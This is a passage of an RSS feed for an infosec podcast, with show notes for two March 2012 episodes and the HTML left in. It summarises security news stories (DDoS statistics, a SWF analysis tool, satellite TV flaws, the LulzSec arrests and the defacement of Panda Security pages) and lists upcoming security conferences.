<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.infosecurity-magazine.com/view/24378/rsa-2012-ddos-attacks-twice-as-likely-to-hit-us-companies-than-uk-/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infosecurity-magazine.com/view/24378/rsa-2012-ddos-attacks-twice-as-likely-to-hit-us-companies-than-uk-/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the RSA 2012 conference last week in San Francisco, Corero Research revealed research findings that show more than half US companies who have been victim of a DDoS attack blame a competitor for the breach.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The research, conducted by VansonBourne &ndash; and commissioned by</span><a href="http://www.corero.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Corero Network Security</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &ndash; took in responses from 300 mid-to large-sized enterprises in both the UK and the US and interestingly reports significantly different results dependent on geography.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Results show that one in three organizations (31%) has suffered at least one Distributed Denial of Service (DDoS) attack in the last 12 months, but that US companies are twice as likely as those in the UK to have experienced an attack: 38% of US companies versus 18% of UK companies.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This could be a combination of speculation &ndash; how the different countries perceive attacks &ndash; and actual concrete differences&rdquo;, Neil Roiter, director of research, Corero, told </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infosecurity </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">at</span><a href="http://www.rsaconference.com/events/2012/usa/mightier.htm"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">RSA</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &ldquo;The UK is less sensitive and thus uses less forensics. Often, people are being attacked and don&rsquo;t know it. Sometimes, it&rsquo;s more obvious. With DDoS attacks on gamer networks, I sometimes wonder how they stay in business during the attack&rdquo;. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://labs.adobe.com/technologies/swfinvestigator/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://labs.adobe.com/technologies/swfinvestigator/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe SWF Investigator is the only comprehensive, cross-platform, GUI-based set of tools, which enables quality engineers, developers and security researchers to quickly analyze SWF files to improve the quality and security of their applications. With SWF Investigator, you can perform both static and dynamic analysis of SWF applications with just one toolset. SWF Investigator lets you quickly inspect every aspect of a SWF file from viewing the individual bits all the way through to dynamically interacting with a running SWF.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SWF Investigator Features</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From a static perspective, you can disassemble ActionScript 2 (AS2) and ActionScript 3 (AS3) SWFs, view SWF tags and make binary changes to SWF files. SWF Investigator also lets you view associated information, including local shared objects (LSOs) and per site settings.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From a dynamic perspective, you can call functions within the SWF, load the SWF in various contexts, communicate via local connections and send messages to Action Message Format (AMF) endpoints in order to test more effectively.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SWF Investigator contains an extensible fuzzer for SWF applications and AMF services, so you can search for common Web application attacks. This toolset also provides a variety of utilities including encoders and decoders for SWF data, as well as a basic compiler for testing small pieces of ActionScript code.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Additional Benefits</span></p>
<ul>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">SWF Investigator is the only application of its kind that&#39;s built on Adobe AIR &ndash; a versatile runtime that supports ActionScript, the language used to create SWF applications. &nbsp;This allows for native interaction between the SWF Investigator and the SWF application. Using ActionScript also makes the source code of the tool more intuitive for SWF developers.</span></li>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">SWF Investigator has the ability to auto-update, so you don&#39;t need to worry about whether or not you have the most current version.</span></li>
<li><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">Since it&#39;s an open source AIR application, SWF Investigator can be modified to fit your environment, and it is cross-platform.</span></li>
</ul>
<p><span id="internal-source-marker_0.28528372664621104" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://news.hitb.org/content/researcher-disclose-crippling-security-flaws-satellite-tv-and-digital-video-broadcast"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.hitb.org/content/researcher-disclose-crippling-security-flaws-satellite-tv-and-digital-video-broadcast</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A well-known Polish security researcher has discovered major security flaws in digital satellite TV set-top-boxes and DVB chipsets used by many satellite TV providers worldwide. The research done by Adam Gowdiak reveals that a combination of security issues present in software, hardware and services from multiple vendors can have a devastating impact on the security of modern digital satellite TV platforms. Gowdiak will be presenting this research in two talks at the third annual Hack In The Box Security Conference in Amsterdam in May (21st &ndash; 25th @ Okura Hotel).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In research spanning over one and a half years, Gowdiak has discovered over 20 security issues in the environment of one of the biggest satellite TV operators in Poland. Gowdiak aims to demonstrate that a novel platform such as digital satellite TV set-top-boxes is not immune to hacking and can be infected with malware in the very same way as computers these days &ndash; automatically and without user interaction.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The research reveals that well constructed malware can break the security of silicon chips implementing advanced security mechanisms in these set-top-boxes. Gowdiak has verified that this can result in the illegal sharing of encrypted satellite TV programming over the Internet with other, non-paying users.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://news.yahoo.com/fbi-irish-misstep-led-conference-call-leak-190633759.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.yahoo.com/fbi-irish-misstep-led-conference-call-leak-190633759.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An Irish police officer&#39;s email blunder led to the spectacular leak of a sensitive conference call between the FBI and Scotland Yard, U.S. law enforcement said Tuesday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An indictment unsealed in a New York court alleges that a teenager linked to the Lulz Security group of hackers was able to eavesdrop on the call after an unnamed officer with Ireland&#39;s national police force forwarded a work message to his insecure personal email account.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The email, which apparently originated from the FBI&#39;s Timothy Lauster, invited dozens of law enforcement officers from across Europe and the United States to coordinate their efforts against LulzSec and its amorphous umbrella group, Anonymous.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI&#39;s indictment said that 19-year-old Donncha O&#39;Cearrbhail intercepted the email and used the information in it to access and secretly record the Jan. 17 call, which hackers subsequently broadcast across the Internet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The indictment said O&#39;Cearrbhail was charged with one count of computer hacking conspiracy, and one count of intentionally disclosing an unlawfully intercepted wire communication.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">O&#39;Cearrbhail was one of five people charged in a multinational operation targeting hackers linked to Lulz Security. His indictment was unsealed on Tuesday as authorities revealed the group&#39;s ringleader had secretly become an FBI informant and turned against his comrades.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A spokesman for the Irish police, known as the Garda Siochana, refused to comment either on the details of the O&#39;Cearrbhail charge or on the nature of the email blunder.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://www.theregister.co.uk/2012/03/07/panda_sec_attacked_by_anon/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.theregister.co.uk/2012/03/07/panda_sec_attacked_by_anon/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a predictable backlash against the sweep that has netted suspected LulzSec members in America and Europe, Anonymous has defaced some web pages of the security firm Panda Security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As previously reported by </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Register</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the arrests turned on the assistance of Hector Xavier Monsegur, known in LulzSec circles as Sabu. Anonymous has added another name-to-blame to the list, accusing Panda Security of helping the FBI by infiltrating chatrooms and message boards.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The promo</span><a href="http://www.cybercrime.pandasecurity.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">page</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Panda Security&rsquo;s &ldquo;Cybercrime Files&rdquo;, has been defaced with a long statement denouncing Sabu, and accusing the security company of &ldquo;working with Law Enforcement to lurk and snitch on anonymous activists&rdquo;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attackers list a total of 36 of the company&rsquo;s pages which it says have been defaced, some of which have either been restored or were listed by mistake.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Anonymous existed before LulzSec and will continue existing,&rdquo; the post also states.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More seriously, the defaced page &ndash; still available at the time of writing &ndash; also shows email addresses and passwords apparently obtained in the attack.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-613-ddos-swf-investigator-satcable-flaws-fbi-oops-and-panda-slap/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3599/0/infosec-daily-podcast-episode-613.mp3" length="14396899" type="audio/mpeg" />
		<itunes:duration>0:29:57</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 613 for March 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24,[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 613 for March 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.infosecurity-magazine.com/view/24378/rsa-2012-ddos-attacks-twice-as-likely-to-hit-us-companies-than-uk-/
	At the RSA 2012 conference last week in San Francisco, Corero Research revealed research findings that show more than half US companies who have been victim of a DDoS attack blame a competitor for the breach.
	The research, conducted by VansonBourne &#8211; and commissioned by Corero Network Security &#8211; took in responses from 300 mid-to large-sized enterprises in both the UK and the US and interestingly reports significantly different results dependent on geography.
	Results show that one in three organizations (31%) has suffered at least one Distributed Denial of Service (DDoS) attack in the last 12 months, but that US companies are twice as likely as those in the UK to have experienced an attack: 38% of US companies versus 18% of UK companies.
	&#8220;This could be a combination of speculation &#8211; how the different countries perceive attacks &#8211; and actual concrete differences&#8221;, Neil Roiter, director of research, Corero, told Infosecurity at RSA. &#8220;The UK is less sensitive and thus uses less forensics. Often, people are being attacked and don&#8217;t know it. Sometimes, it&#8217;s more obvious. With DDoS attacks on gamer networks, I sometimes wonder how they stay in business during the attack&#8221;. 
	&#8230;.
	Source: 
	http://labs.adobe.com/technologies/swfinvestigator/
	Adobe SWF Investigator is the only comprehensive, cross-platform, GUI-based set of tools, which enables quality engineers, developers and security researchers to quickly analyze SWF files to improve the quality and security of their applications. With SWF Investigator, you can perform both static and dynamic analysis of SWF applications with just one toolset. SWF Investigator lets you quickly inspect every aspect of a SWF file from viewing the individual bits all the way through to dynamically interacting with a running SWF.
	SWF Investig[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 612 &#8211; Illegal Tweets, Kill Switch for 8, and Sabu The Fed</title>
		<link>http://www.isdpodcast.com/episode-612-illegal-tweets-kill-switch-for-8-and-sabu-the-fed</link>
		<comments>http://www.isdpodcast.com/episode-612-illegal-tweets-kill-switch-for-8-and-sabu-the-fed#comments</comments>
		<pubDate>Wed, 07 Mar 2012 00:47:31 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3594</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 612 for March 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD http://www.social-engineer.com/social-engineer-training InfoSec Southwest When: March [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 612 for March 6, 2012. &nbsp;Tonight&#39;s podcast is hosted by </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick Hayes, Boris Sverdlik, Themson Mester, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
